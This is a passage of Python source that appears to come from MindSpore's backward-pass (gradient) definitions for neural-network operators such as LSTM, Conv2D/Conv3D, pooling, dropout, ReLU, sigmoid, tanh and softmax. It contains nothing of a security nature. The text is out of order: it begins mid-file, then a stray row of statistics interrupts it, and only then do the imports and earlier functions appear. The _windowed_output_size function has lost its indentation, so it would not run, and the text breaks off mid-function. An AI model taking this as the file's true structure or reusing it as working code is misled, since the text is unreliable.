    lstm_grad_data = G.LSTMGradData(
        input_size=self.input_size,
        hidden_size=self.hidden_size,
        num_layers=self.num_layers,
        has_bias=self.has_bias,
        bidirectional=self.bidirectional,
        dropout=self.dropout
    )
    lstm_grad_weight = G.LSTMGradWeight(
        input_size=self.input_size,
        hidden_size=self.hidden_size,
        num_layers=self.num_layers,
        has_bias=self.has_bias,
        bidirectional=self.bidirectional,
        dropout=self.dropout
    )
    lstm_grad = G.LSTMGrad(
        input_size=self.input_size,
        hidden_size=self.hidden_size,
        num_layers=self.num_layers,
        has_bias=self.has_bias,
        bidirectional=self.bidirectional,
        dropout=self.dropout
    )
    def bprop(x, hx, cx, w, out, dout):
        # Default path: separate kernels for data and weight gradients.
        y, _, _, reserve, state = out
        dy, dhy, dcy, _, _ = dout
        dx, dhx, dcx = lstm_grad_data(y, dy, dhy, dcy, w, hx, cx, reserve, state)
        # `depend` forces the weight-grad kernel to run after the data-grad kernel.
        dw = lstm_grad_weight(F.depend(x, dx), hx, y, reserve, state)
        return dx, dhx, dcx, dw
    # CPU path: one fused kernel computes all gradients.
    def bprop_cpu(x, hx, cx, w, out, dout):
        y, hy, cy, reserve, _ = out
        dy, dhy, dcy, _, _ = dout
        dx, dhx, dcx, dw = lstm_grad(x, hx, cx, w, y, hy, cy, dy, dhy, dcy, reserve)
        return dx, dhx, dcx, dw
    if context.get_context('device_target') == "CPU":
        return bprop_cpu
    return bprop
@bprop_getters.register(P.DynamicRNN)
def get_bprop_dynamic_rnn(self):
    """Grad definition for `DynamicRNN` operation."""
    dynamic_rnn_grad = G.DynamicRNNGrad(cell_type=self.cell_type,
                                        direction=self.direction,
                                        cell_depth=self.cell_depth,
                                        use_peephole=self.use_peephole,
                                        keep_prob=self.keep_prob,
                                        cell_clip=self.cell_clip,
                                        num_proj=self.num_proj,
                                        time_major=self.time_major,
                                        forget_bias=self.forget_bias)
    expand_dims = P.ExpandDims()
    def bprop(x, w, b, seq_length, init_h, init_c, out, dout):
        dy, dh, dc, _, _, _, _, _, = dout
        # Only the last-step gradients of h/c feed the backward recursion.
        dh = dh[-1]
        dc = dc[-1]
        y, h, c, i, j, f, o, tanhct = out
        dw, db, dx, dh_prev, dc_prev = dynamic_rnn_grad(x, w, b, y, init_h[0], init_c[0], h,
                                                        c, dy, dh, dc, i, j, f, o, tanhct)
        # Restore the leading time dimension stripped above.
        dh_prev = expand_dims(dh_prev, 0)
        dc_prev = expand_dims(dc_prev, 0)
        # seq_length is not differentiable; (0) is its placeholder gradient.
        return dx, dw, db, (0), dh_prev, dc_prev
    return bprop
@bprop_getters.register(P.DynamicGRUV2)
def get_bprop_dynamic_gru_v2(self):
    """Grad definition for `DynamicGRUV2` operation."""
    dynamic_gru_v2_grad = G.DynamicGRUV2Grad(self.direction, self.cell_depth, self.keep_prob, self.cell_clip,
                                             self.num_proj, self.time_major, self.gate_order,
                                             self.reset_after)
    def bprop(x, winput, whidden, binput, bhidden, seq, init_h, out, dout):
        y, out_h, update, reset, new, hidden_new = out
        dy, dout_h, _, _, _, _ = dout
        # Only the last step of dout_h feeds the backward recursion.
        dw_input, dw_hidden, db_input, db_hidden, dx, dh_prev = dynamic_gru_v2_grad(x, winput, whidden, y, init_h,
                                                                                    out_h, dy, dout_h[-1], update,
                                                                                    reset, new, hidden_new, None, None)
        # seq is not differentiable; (0) is its placeholder gradient.
        return dx, dw_input, dw_hidden, db_input, db_hidden, (0), dh_prev
    return bprop
@bprop_getters.register(P.SigmoidCrossEntropyWithLogits)
def get_bprop_sigmoid_crossentropy_with_logits(self):
    """Grad definition for `SigmoidCrossEntropyWithLogits` operation."""
    op = G.SigmoidCrossEntropyWithLogitsGrad()
    def bprop(x, y, out, dout):
        # Labels are not differentiable.
        dx = op(x, y, dout)
        return (dx, zeros_like(y))
    return bprop
@bprop_getters.register(P.Pad)
def get_bprop_pad(self):
    """Grad definition for `Pad` operation."""
    shape_op = P.Shape()
    paddings = self.paddings
    def bprop(x, out, dout):
        # Slice the padded gradient back down to the original input region:
        # start at each dim's leading pad amount, take the input's extent.
        begin = ()
        for item in paddings:
            begin += (item[0],)
        shp = shape_op(x)
        dx = P.Slice()(dout, begin, shp)
        return (dx,)
    return bprop
@bprop_getters.register(P.MirrorPad)
def get_bprop_mirror_pad(self):
    """Grad definition for `MirrorPad` operation."""
    mirror_pad_grad = G.MirrorPadGrad(self.mode)
    def bprop(x, paddings, out, dout):
        # The paddings tensor is configuration, not a differentiable input.
        dx = mirror_pad_grad(dout, paddings)
        return (dx, zeros_like(paddings))
    return bprop
@bprop_getters.register(P.ROIAlign)
def get_bprop_roi_align(self):
    """Grad definition for `ROIAlign` operation."""
    shape_op = P.Shape()
    pooled_height = self.pooled_height
    pooled_width = self.pooled_width
    spatial_scale = self.spatial_scale
    sample_num = self.sample_num
    def bprop(inputs, rois, out, dout):
        # Grad op needs the input feature-map shape; it is instantiated per call
        # because the shape is only known inside the bprop.
        inputs_shape = shape_op(inputs)
        dx = G.ROIAlignGrad(inputs_shape,
                            pooled_height,
                            pooled_width,
                            spatial_scale,
                            sample_num,
                            )(dout, rois)
        # ROIs are treated as non-differentiable coordinates.
        return dx, zeros_like(rois)
    return bprop
@bprop_getters.register(P.Conv2DBackpropInput)
def get_bprop_conv2d_backprop_input(self):
    """Grad definition for `Conv2DBackpropInput` operation (second-order gradient)."""
    filter_grad = G.Conv2DBackpropFilter(
        self.out_channel, self.kernel_size, self.pad_mode, self.pad, self.pad_list, mode=self.mode,
        dilation=self.dilation, stride=self.stride, group=self.group, data_format=self.format
    )
    # Gradient of a transposed conv w.r.t. its input-gradient argument is a forward conv.
    input_grad = P.Conv2D(
        self.out_channel, self.kernel_size, pad_mode=self.pad_mode.lower(), pad=self.pad,
        dilation=self.dilation, stride=self.stride, group=self.group, data_format=self.format
    )
    def bprop(x, w, f_sizes, out, dout):
        dx = input_grad(dout, w)
        if env_force_bprop_seq == '1':
            # Optional env switch to serialize the two grad kernels via a data dependency.
            x = F.depend(x, dx)
        dw = filter_grad(x, dout, F.shape(w))
        return dx, dw, zeros_like(f_sizes)
    return bprop
@bprop_getters.register(P.BinaryCrossEntropy)
def get_bprop_binary_cross_entropy(self):
    """Grad definition for `BinaryCrossEntropy` operation."""
    grad = G.BinaryCrossEntropyGrad(self.reduction)
    def bprop(x, y, weight, out, dout):
        # Labels and element weights are not differentiable.
        dx = grad(x, y, dout, weight)
        return dx, zeros_like(y), zeros_like(weight)
    return bprop
@bprop_getters.register(P.KLDivLoss)
def get_bprop_kl_div_loss(self):
    """Grad definition for `KLDivLoss` operation."""
    grad = G.KLDivLossGrad(self.reduction)
    def bprop(x, y, out, dout):
        # One fused kernel returns gradients for both inputs.
        dx, dy = grad(x, y, dout)
        return dx, dy
    return bprop
@bprop_getters.register(P.Dropout)
def get_bprop_dropout(self):
    """Grad definition for `Dropout` operation."""
    grad = G.DropoutGrad(self.keep_prob)
    def bprop(x, out, dout):
        # Forward returns (output, mask); the mask routes the gradient.
        _, mask = out
        dy, _ = dout
        dx = grad(dy, mask)
        return (dx,)
    return bprop
@bprop_getters.register(P.CTCLoss)
def get_bprop_ctc_loss(self):
    """Grad definition for `CTCLoss` operation"""
    expand = P.ExpandDims()
    def bprop(inputs, labels_indices, labels_values, sequence_length, out, dout):
        # out[1] holds the per-logit gradient; scale it by the incoming loss gradient.
        grad_loss = out[1]
        grad = grad_loss * expand(dout[0], -1)
        return grad, zeros_like(labels_indices), zeros_like(labels_values), zeros_like(sequence_length)
    return bprop
@bprop_getters.register(P.BasicLSTMCell)
def get_bprop_basic_lstm_cell(self):
    """Grad definition for `BasicLSTMCell` operation."""
    basic_lstm_cell_cstate_grad = G.BasicLSTMCellCStateGrad(
        forget_bias=self.forget_bias,
        activation=self.activation
    )
    basic_lstm_cell_weight_grad = G.BasicLSTMCellWeightGrad()
    basic_lstm_cell_input_grad = G.BasicLSTMCellInputGrad(keep_prob=self.keep_prob)
    def bprop(x, h, c, w, b, out, dout):
        # Forward saves the four gate activations (i, j, f, o) and tanh(c_t).
        _, _, it, jt, ft, ot, tanhct = out
        dct, dht, _, _, _, _, _ = dout
        # Backprop through the cell state first, then through input/weights.
        dgate, dct_1 = basic_lstm_cell_cstate_grad(c, dht, dct, it, jt, ft, ot, tanhct)
        dxt, dht = basic_lstm_cell_input_grad(dgate, w)
        # `depend` orders the weight-grad kernel after the input-grad kernel.
        dw, db = basic_lstm_cell_weight_grad(F.depend(x, dxt), h, dgate)
        return dxt, dht, dct_1, dw, db
    return bprop
@bprop_getters.register(P.LRN)
def get_bprop_lrn(self):
    """Grad definition for `LRN` operation."""
    grad = G.LRNGrad(self.depth_radius, self.bias, self.alpha, self.beta)
    def bprop(x, out, dout):
        # LRNGrad takes (dout, forward_input, forward_output).
        dx = grad(dout, x, out)
        return (dx,)
    return bprop
| 31.165737 | 119 | 0.635109 |
import os
import numpy as np
from mindspore.ops import _selected_grad_ops as SG
from mindspore.ops.primitive import constexpr
from mindspore.common.tensor import Tensor
from mindspore.ops.operations import nn_ops as nps
from .grad_base import bprop_getters
from .. import functional as F
from .. import operations as P
from ...common import dtype as mstype
from ..composite.multitype_ops.zeros_like_impl import zeros_like
from ..operations import _grad_ops as G
from ..operations import _inner_ops as inner
from ... import context
env_force_bprop_seq = os.getenv("ENV_FORCE_BPROP_SEQ")
@bprop_getters.register(P.BiasAdd)
def get_bprop_bias_add(self):
    """Grad definition for `BiasAdd` operation."""
    bias_grad = SG.BiasAddGrad(self.data_format)
    def bprop(x, w, out, dout):
        # dout passes straight through to x; the bias grad reduces dout over non-channel dims.
        return dout, bias_grad(dout)
    return bprop
@bprop_getters.register(P.Conv2D)
def get_bprop_conv2d(self):
    """Grad definition for `Conv2D` operation."""
    input_grad = P.Conv2DBackpropInput(
        self.out_channel, self.kernel_size, self.pad_mode, self.pad, self.pad_list, mode=self.mode,
        dilation=self.dilation, stride=self.stride, group=self.group, data_format=self.format
    )
    filter_grad = G.Conv2DBackpropFilter(
        self.out_channel, self.kernel_size, self.pad_mode, self.pad, self.pad_list, mode=self.mode,
        dilation=self.dilation, stride=self.stride, group=self.group, data_format=self.format
    )
    get_shape = P.Shape()
    def bprop(x, w, out, dout):
        dx = input_grad(dout, w, get_shape(x))
        if env_force_bprop_seq == '1':
            # Optional env switch to serialize the two grad kernels via a data dependency.
            x = F.depend(x, dx)
        dw = filter_grad(dout, x, get_shape(w))
        return dx, dw
    return bprop
@bprop_getters.register(nps.Conv3D)
def get_bprop_conv3d(self):
    """Grad definition for `Conv3D` operation."""
    input_grad = nps.Conv3DBackpropInput(
        self.out_channel, self.kernel_size, self.mode, pad_mode=self.pad_mode,
        pad=self.pad, stride=self.stride, dilation=self.dilation, group=self.group, data_format=self.data_format
    )
    filter_grad = G.Conv3DBackpropFilter(
        self.out_channel, self.kernel_size, self.mode, pad_mode=self.pad_mode,
        pad=self.pad, stride=self.stride, dilation=self.dilation, group=self.group, data_format=self.data_format
    )
    get_shape = P.Shape()
    def bprop(x, w, out, dout):
        # Note Conv3DBackpropInput takes (w, dout, ...) — a different order from the 2D op.
        dx = input_grad(w, dout, get_shape(x))
        dw = filter_grad(x, dout, get_shape(w))
        return dx, dw
    return bprop
@bprop_getters.register(nps.Conv3DTranspose)
def get_bprop_conv3d_transpose(self):
    """Grad definition for `Conv3DTranspose` operation."""
    # Gradient of a transposed conv w.r.t. its input is a forward conv.
    input_grad = nps.Conv3D(
        out_channel=self.in_channel, kernel_size=self.kernel_size, mode=self.mode, pad_mode="pad",
        pad=self.pad, stride=self.stride, dilation=self.dilation, group=self.group, data_format=self.data_format
    )
    filter_grad = G.Conv3DBackpropFilter(
        out_channel=self.in_channel, kernel_size=self.kernel_size, mode=self.mode, pad_mode="pad",
        pad=self.pad, stride=self.stride, dilation=self.dilation, group=self.group, data_format=self.data_format
    )
    input_size = self.input_size
    def bprop(x, w, out, dout):
        dx = input_grad(dout, w)
        dw = filter_grad(dout, x, F.shape(w))
        return dx, dw, zeros_like(input_size)
    return bprop
@bprop_getters.register(inner.ExtractImagePatches)
def get_bprop_extract_image_patches(self):
    """Grad definition for `ExtractImagePatches` operation."""
    get_shape = P.Shape()
    reshape = P.Reshape()
    extract_image_patches = inner.ExtractImagePatches(ksizes=self.ksizes,
                                                      strides=self.strides,
                                                      rates=self.rates,
                                                      padding=self.padding)
    concat = P.Concat(axis=-1)
    expand_dims = P.ExpandDims()
    scatter_nd = P.ScatterNd()
    dtype = P.DType()
    fill = P.Fill()
    slice_op = P.Slice()
    transpose = P.Transpose()
    cast = P.Cast()
    matmul = P.MatMul()
    _, _, ksizes_row, ksizes_col = self.ksizes
    def bprop(x, out, dout):
        # Strategy: run the forward op on a tensor of input-position ids to learn
        # which input element feeds which patch slot, build a sparse 0/1
        # input-to-output mapping from that, then accumulate dout through it.
        x_shape = get_shape(x)
        x_batch, x_depth, x_row, x_col = x_shape
        # Id 0 is reserved for padding; real positions are 1..x_row*x_col.
        x_indices_num = x_row * x_col + 1
        x_idx = cast(F.tuple_to_array(range(1, x_indices_num)), mstype.float32)
        x_idx = reshape(x_idx, (1, 1, x_row, x_col))
        x_idx_patch = cast(extract_image_patches(x_idx), mstype.int32)
        x_idx_patch = transpose(x_idx_patch, (0, 2, 3, 1))
        out_shape = get_shape(out)
        _, _, out_row, out_col = out_shape
        out_indices_num = out_row * out_col * ksizes_row * ksizes_col
        out_idx = F.tuple_to_array(range(out_indices_num))
        out_idx = reshape(out_idx, (1, out_row, out_col, ksizes_row * ksizes_col))
        # Pair each (input id, output slot) and scatter 1s into a mapping matrix.
        idx_tensor = concat((expand_dims(x_idx_patch, -1), expand_dims(out_idx, -1)))
        idx_tensor = reshape(idx_tensor, (-1, 2))
        sp_shape = (x_indices_num, out_indices_num)
        sp_tensor = scatter_nd(idx_tensor, fill(dtype(dout), (out_indices_num,), 1), sp_shape)
        # Drop row 0, which collected the padding contributions.
        sp_tensor = slice_op(sp_tensor, (1, 0), (x_indices_num - 1, out_indices_num))
        grad = transpose(dout, (0, 2, 3, 1))
        grad = reshape(grad, (x_batch, out_row, out_col, ksizes_row, ksizes_col, x_depth))
        grad = transpose(grad, (1, 2, 3, 4, 0, 5))
        grad = reshape(grad, (-1, x_batch * x_depth))
        # Matmul sums every patch slot's gradient back onto its source input position.
        jac = matmul(sp_tensor, grad)
        dx = reshape(jac, (x_row, x_col, x_batch, x_depth))
        dx = transpose(dx, (2, 3, 0, 1))
        return (dx,)
    return bprop
@bprop_getters.register(P.DepthwiseConv2dNative)
def get_bprop_depthwise_conv2d_native(self):
    """Grad definition for `DepthwiseConv2dNative` operation."""
    input_grad = G.DepthwiseConv2dNativeBackpropInput(
        self.channel_multiplier, self.kernel_size, self.pad_mode, self.pad, self.pad_list, self.mode, self.stride,
        self.dilation, self.group
    )
    filter_grad = G.DepthwiseConv2dNativeBackpropFilter(
        self.channel_multiplier, self.kernel_size, self.pad_mode, self.pad, self.pad_list, self.mode, self.stride,
        self.dilation, self.group
    )
    get_shape = P.Shape()
    def bprop(x, w, out, dout):
        dx = input_grad(get_shape(x), w, dout)
        if env_force_bprop_seq == '1':
            # Optional env switch to serialize the two grad kernels via a data dependency.
            x = F.depend(x, dx)
        dw = filter_grad(x, get_shape(w), dout)
        return dx, dw
    return bprop
@bprop_getters.register(P.MaxPoolWithArgmax)
def get_bprop_max_pool_with_argmax(self):
    """Grad definition for `MaxPoolWithArgmax` operation."""
    maxpool_grad = G.MaxPoolGradWithArgmax(
        kernel_size=self.kernel_size,
        strides=self.strides,
        pad_mode=self.pad_mode)
    def bprop(x, out, dout):
        # Forward returns (output, argmax); the argmax routes the gradient.
        dx = maxpool_grad(x, dout[0], out[1])
        return (dx,)
    return bprop
@bprop_getters.register(G.MaxPoolGrad)
def get_bprop_max_pool_grad_grad(self):
    """Grad definition for `MaxPoolGrad` operation (second-order gradient)."""
    maxpool_grad_grad = G.MaxPoolGradGrad(
        kernel_size=self.kernel_size,
        strides=self.strides,
        pad_mode=self.pad_mode)
    def bprop(x1, x2, grad, out, dout):
        # Only the incoming-gradient argument is differentiable.
        dx1 = zeros_like(x1)
        dx2 = zeros_like(x2)
        dgrad = maxpool_grad_grad(x1, x2, dout)
        return (dx1, dx2, dgrad)
    return bprop
@bprop_getters.register(G.MaxPoolGradGrad)
def get_bprop_max_pool_grad_grad_grad(self):
    """Grad definition for `MaxPoolGradGrad` operation (third-order gradient)."""
    maxpool_grad = G.MaxPoolGrad(
        kernel_size=self.kernel_size,
        strides=self.strides,
        pad_mode=self.pad_mode)
    def bprop(x1, x2, grad, out, dout):
        # Only the incoming-gradient argument is differentiable.
        dx1 = zeros_like(x1)
        dx2 = zeros_like(x2)
        dgrad = maxpool_grad(x1, x2, dout)
        return (dx1, dx2, dgrad)
    return bprop
@bprop_getters.register(P.MaxPool)
def get_bprop_max_pool_grad(self):
    """Grad definition for `MaxPool` operation."""
    maxpool_grad = G.MaxPoolGrad(
        kernel_size=self.kernel_size,
        strides=self.strides,
        pad_mode=self.pad_mode,
        data_format=self.format)
    def bprop(x, out, dout):
        # MaxPoolGrad takes (forward_input, forward_output, dout).
        dx = maxpool_grad(x, out, dout)
        return (dx,)
    return bprop
def _windowed_output_size(input_size, ksize, stride, pad_mode):
tmp_output = 0
tmp_pad_need = 0
tmp_pad_before = 0
tmp_pad_after = 0
if pad_mode == 'VALID':
tmp_output = (input_size - ksize + stride) // stride
tmp_pad_before = 0
tmp_pad_after = 0
elif pad_mode == 'SAME':
tmp_output = (input_size + stride - 1) // stride
tmp_pad_need = max(0, (tmp_output - 1) * stride + ksize - input_size)
tmp_pad_before = tmp_pad_need // 2
tmp_pad_after = tmp_pad_need - tmp_pad_before
return tmp_output, tmp_pad_before, tmp_pad_after
@constexpr
def _get_mean_matrix(x_shape, ksize, stride, pad_mode, x_dtype):
    """Build the (N, C, H_out, W_out) Tensor of 1/window_count coefficients for AvgPoolGradVm."""
    n_input, c_input, h_input, w_input = x_shape
    h_ksize, w_ksize = ksize[2], ksize[3]
    h_stride, w_stride = stride[2], stride[3]
    n_output = n_input
    c_output = c_input
    h_output, w_output = 0, 0
    pad_top, pad_bottom, pad_left, pad_right = 0, 0, 0, 0
    h_output, pad_top, pad_bottom = _windowed_output_size(h_input, h_ksize,
                                                          h_stride, pad_mode)
    w_output, pad_left, pad_right = _windowed_output_size(w_input, w_ksize,
                                                          w_stride, pad_mode)
    output_size = n_output * c_output * h_output * w_output
    output_shape = (n_output, c_output, h_output, w_output)
    output = np.array([0.0] * output_size)
    output = np.reshape(output, output_shape)
    # 1 marks a real input position, 0 marks padding, so a window's sum
    # equals the number of valid inputs it covers.
    in_shape_after_padding_2d = (h_input + pad_top + pad_bottom, w_input + pad_left + pad_right)
    assist_input_matrix = np.ones(in_shape_after_padding_2d).astype(np.float32)
    if pad_top > 0:
        assist_input_matrix[:pad_top, :] = 0
    if pad_bottom > 0:
        assist_input_matrix[-pad_bottom:, :] = 0
    if pad_left > 0:
        assist_input_matrix[:, :pad_left] = 0
    if pad_right > 0:
        assist_input_matrix[:, -pad_right:] = 0
    for h in range(h_output):
        for w in range(w_output):
            curr_input = assist_input_matrix[h*h_stride : h*h_stride + h_ksize, w*w_stride : w*w_stride + w_ksize]
            curr_sum = np.sum(curr_input)
            if curr_sum > 0:
                output[:, :, h, w] = 1. / curr_sum
    return Tensor(output, x_dtype)
@constexpr
def _get_kernel_matrix(x_shape_nchw, kernel_matrix_shape, pad_mode, x_dtype):
    """Build an all-ones kernel Tensor for AvgPoolGradVm (x_shape_nchw and pad_mode are unused here)."""
    kernel_matrix = np.ones(kernel_matrix_shape)
    return Tensor(kernel_matrix, x_dtype)
@bprop_getters.register(P.AvgPool)
def get_bprop_avg_pool_grad(self):
    """Grad definition for `AvgPool` operation."""
    # Each backend exposes a different AvgPool grad kernel with a different
    # call signature, so a backend-specific bprop closure is selected here.
    if self.target == "GPU":
        avgpool_grad_gpu = G.AvgPoolGradGpu(
            kernel_size=self.kernel_size,
            strides=self.strides,
            pad_mode=self.pad_mode,
            data_format=self.format)
        def bprop_gpu(x, out, dout):
            dx = avgpool_grad_gpu(x, out, dout)
            return (dx,)
        bprop_fn = bprop_gpu
    elif self.target == "CPU":
        avgpool_grad_cpu = G.AvgPoolGradCpu(
            kernel_size=self.kernel_size,
            strides=self.strides,
            pad_mode=self.pad_mode,
            data_format=self.format)
        def bprop_cpu(x, out, dout):
            dx = avgpool_grad_cpu(x, out, dout)
            return (dx,)
        bprop_fn = bprop_cpu
    elif self.target == "GE":
        avgpool_grad_ge = G.AvgPoolGrad(
            kernel_size=self.kernel_size,
            strides=self.strides,
            pad_mode=self.pad_mode)
        shape_op = P.Shape()
        def bprop_ge(x, out, dout):
            # GE kernel only needs the forward input's shape, not its values.
            dx = avgpool_grad_ge(shape_op(x), dout)
            return (dx,)
        bprop_fn = bprop_ge
    else:
        avgpool_grad_vm = G.AvgPoolGradVm(
            kernel_size=self.kernel_size,
            strides=self.strides,
            pad_mode=self.pad_mode)
        k_size_nchw = avgpool_grad_vm.kernel_size
        stride_nchw = avgpool_grad_vm.strides
        pad_mode = self.pad_mode
        def bprop_vm(x, out, dout):
            x_shape_nchw = F.shape(x)
            x_dtype = F.dtype(x)
            kernel_matrix_shape = (1, x_shape_nchw[1],
                                   k_size_nchw[2],
                                   k_size_nchw[3])
            # VM kernel needs precomputed 1/window_count coefficients and a
            # ones kernel; both are built at compile time via @constexpr helpers.
            mean_matrix = _get_mean_matrix(x_shape_nchw, k_size_nchw, stride_nchw, pad_mode, x_dtype)
            kernel_matrix = _get_kernel_matrix(x_shape_nchw, kernel_matrix_shape, pad_mode, x_dtype)
            dx = avgpool_grad_vm(x_shape_nchw, dout, mean_matrix, kernel_matrix)
            return (dx,)
        bprop_fn = bprop_vm
    return bprop_fn
@bprop_getters.register(P.DropoutGenMask)
def get_bprop_dropout_gen_mask(self):
    """Grad definition for `DropoutGenMask` operation (mask generation is not differentiable)."""
    def bprop(shape, keep_prob, out, dout):
        return (zeros_like(shape), zeros_like(keep_prob))
    return bprop
@bprop_getters.register(P.DropoutDoMask)
def get_bprop_dropout_do_mask(self):
    """Grad definition for `DropoutDoMask` operation."""
    do_mask = P.DropoutDoMask()
    def bprop(x, y, keep_prob, out, dout):
        # Re-applying the same mask to dout routes gradient only through the
        # elements that were kept in the forward pass.
        return (do_mask(dout, y, keep_prob), zeros_like(y), zeros_like(keep_prob))
    return bprop
@bprop_getters.register(P.Mish)
def get_bprop_mish(self):
    """Grad definition for `Mish` operation (mish(x) = x * tanh(softplus(x)))."""
    tanh = P.Tanh()
    tanh_grad = SG.TanhGrad()
    softplus = P.Softplus()
    softplus_grad = G.SoftplusGrad()
    def bprop(x, out, dout):
        # Product rule: d/dx [x * tanh(softplus(x))]
        #   = tanh(softplus(x)) * dout + x * tanh'(softplus(x)) * softplus'(x) * dout
        dx1 = tanh(softplus(x))
        dx2 = softplus_grad(tanh_grad(dx1, x * dout), x)
        dx = (dx1 * dout + dx2)
        return (dx,)
    return bprop
@bprop_getters.register(P.SeLU)
def get_bprop_selu(self):
    """Grad definition for `SeLU` operation."""
    # SELU's fixed scale constant; the gradient is the ELU gradient scaled by it.
    scale = 1.0507009873554804934193349852946
    elu_grad = G.EluGrad()
    def bprop(x, out, dout):
        dx = elu_grad(dout, out) * scale
        return (dx,)
    return bprop
@bprop_getters.register(P.MulNoNan)
def get_bprop_mul_no_nan(self):
    """Grad definition for `MulNoNan` operation."""
    mul_no_nan = P.MulNoNan()
    reduce_sum = P.ReduceSum()
    reshape = P.Reshape()
    def bprop(x, y, out, dout):
        x_shape = F.shape(x)
        y_shape = F.shape(y)
        # Use MulNoNan for the products so a zero on one side still suppresses
        # NaN/Inf from the other side, matching the forward op's semantics.
        dx = mul_no_nan(dout, y)
        dy = mul_no_nan(x, dout)
        # Reduce the gradients over the axes that were broadcast in the
        # forward pass, then restore each operand's original shape.
        broadcast_x, broadcast_y = F.broadcast_gradient_args(x_shape, y_shape)
        if broadcast_x != ():
            dx = reshape(reduce_sum(dx, broadcast_x), x_shape)
        if broadcast_y != ():
            dy = reshape(reduce_sum(dy, broadcast_y), y_shape)
        return dx, dy
    return bprop
@bprop_getters.register(P.ReLU)
def get_bprop_relu(self):
    """Grad definition for `ReLU` operation."""
    input_grad = G.ReluGrad()
    def bprop(x, out, dout):
        # ReluGrad masks dout using the forward output's activation pattern.
        dx = input_grad(dout, out)
        return (dx,)
    return bprop
@bprop_getters.register(G.ReluGrad)
def get_bprop_relu_grad(self):
    """Grad definition for `ReluGrad` operation (second-order ReLU grad)."""
    input_grad = G.ReluGrad()
    def bprop(grad, y, out, dout):
        # ReluGrad is linear in `grad`, so its gradient re-applies the same mask.
        dgrad = input_grad(dout, y)
        return dgrad, zeros_like(y)
    return bprop
@bprop_getters.register(P.ReLU6)
def get_bprop_relu6(self):
    """Grad definition for `ReLU6` operation."""
    input_grad = G.ReLU6Grad()
    def bprop(x, out, dout):
        dx = input_grad(dout, x)
        return (dx,)
    return bprop
@bprop_getters.register(P.ReLUV2)
def get_bprop_relu_v2(self):
    """Grad definition for `ReLUV2` operation."""
    input_grad = G.ReluGradV2()
    def bprop(x, out, dout):
        # ReLUV2's forward returns (output, mask); only the output carries an
        # incoming gradient, and the saved mask selects the active elements.
        mask = out[1]
        dx = input_grad(dout[0], mask)
        return (dx,)
    return bprop
@bprop_getters.register(P.HSwish)
def get_bprop_hswish(self):
    """Grad definition for `HSwish` operation."""
    input_grad = G.HSwishGrad()
    def bprop(x, out, dout):
        dx = input_grad(dout, x)
        return (dx,)
    return bprop
@bprop_getters.register(P.HSigmoid)
def get_bprop_hsigmoid(self):
    """Grad definition for `HSigmoid` operation."""
    input_grad = G.HSigmoidGrad()
    def bprop(x, out, dout):
        dx = input_grad(dout, x)
        return (dx,)
    return bprop
@bprop_getters.register(P.Elu)
def get_bprop_elu(self):
    """Grad definition for `Elu` operation."""
    input_grad = G.EluGrad()
    def bprop(x, out, dout):
        # EluGrad consumes the forward output, not the input.
        dx = input_grad(dout, out)
        return (dx,)
    return bprop
@bprop_getters.register(P.Sigmoid)
def get_bprop_sigmoid(self):
    """Grad definition for `Sigmoid` operation."""
    input_grad = G.SigmoidGrad()
    def bprop(x, out, dout):
        # Note the (y, dy) argument order of SigmoidGrad, unlike most grads here.
        dx = input_grad(out, dout)
        return (dx,)
    return bprop
@bprop_getters.register(G.SigmoidGrad)
def get_bprop_sigmoid_grad(self):
    """Grad definition for `SigmoidGrad` operation (second-order sigmoid grad)."""
    sigmoid_grad = G.SigmoidGrad()
    def bprop(y, grad, out, dout):
        # SigmoidGrad(y, grad) = grad * y * (1 - y); differentiating:
        #   d/dy    -> dout * grad * (1 - 2y)
        #   d/dgrad -> y * (1 - y) * dout, i.e. SigmoidGrad(y, dout)
        dy = dout * grad * (1. - 2 * y)
        dgrad = sigmoid_grad(y, dout)
        return dy, dgrad
    return bprop
@constexpr
def _get_transpose_axis(x_shp, axis):
    """Return a permutation tuple that swaps `axis` with the last dimension of `x_shp`."""
    rank = len(x_shp)
    if axis < 0:
        axis += rank
    perm = list(range(rank))
    # Swapping with the identity permutation places `rank - 1` at `axis` and
    # `axis` at the last position, exactly as the original element-wise writes did.
    perm[axis], perm[rank - 1] = perm[rank - 1], perm[axis]
    return tuple(perm)
@bprop_getters.register(P.Softmax)
def get_bprop_softmax(self):
    """Grad definition for `Softmax` operation."""
    sum_func = P.ReduceSum(keep_dims=True)
    sub = P.Sub()
    mul = P.Mul()
    get_shape = P.Shape()
    transpose = P.Transpose()
    axis = self.axis
    if not isinstance(axis, int):
        axis = axis[0]
    def bprop(x, out, dout):
        # Move the softmax axis to the last position so the reduction below can
        # always run over axis -1; the swap permutation is its own inverse, so
        # the same permutation moves the result back.
        reverse_axis = _get_transpose_axis(get_shape(x), axis)
        out = transpose(out, reverse_axis)
        dout = transpose(dout, reverse_axis)
        # dx = out * (dout - sum(out * dout, axis=-1, keepdims=True))
        dx = mul(out, sub(dout, sum_func(mul(out, dout), -1)))
        dx = transpose(dx, reverse_axis)
        return (dx,)
    return bprop
@bprop_getters.register(P.LogSoftmax)
def get_bprop_log_softmax(self):
    """Grad definition for `LogSoftmax` operation."""
    logsoftmax_grad = G.LogSoftmaxGrad(self.axis)
    def bprop(x, out, dout):
        dx = logsoftmax_grad(out, dout)
        return (dx,)
    return bprop
@bprop_getters.register(P.Softplus)
def get_bprop_softplus(self):
    """Grad definition for `Softplus` operation."""
    softplus_grad = G.SoftplusGrad()
    def bprop(x, out, dout):
        dx = softplus_grad(dout, x)
        return (dx,)
    return bprop
@bprop_getters.register(P.Softsign)
def get_bprop_softsign(self):
    """Grad definition for `Softsign` operation (softsign(x) = x / (1 + |x|))."""
    mul = P.Mul()
    absolute = P.Abs()
    div = P.Div()
    square = P.Square()
    def bprop(x, out, dout):
        # d/dx [x / (1 + |x|)] = 1 / (1 + |x|)^2
        dx = mul(dout, div(1, square(1 + absolute(x))))
        return (dx,)
    return bprop
@bprop_getters.register(P.Tanh)
def get_bprop_tanh(self):
    """Grad definition for `Tanh` operation."""
    tanh_grad = SG.TanhGrad()
    def bprop(x, out, dout):
        # TanhGrad consumes the forward output (y, dy order).
        dx = tanh_grad(out, dout)
        return (dx,)
    return bprop
@bprop_getters.register(G.TanhGrad)
def get_bprop_tanh_grad(self):
    """Grad definition for `TanhGrad` operation (second-order tanh grad)."""
    tanh_grad = G.TanhGrad()
    def bprop(y, grad, out, dout):
        # TanhGrad(y, grad) = grad * (1 - y^2); differentiating:
        #   d/dy    -> -2 * y * grad * dout
        #   d/dgrad -> (1 - y^2) * dout, i.e. TanhGrad(y, dout)
        dy = dout * -2.0 * grad * y
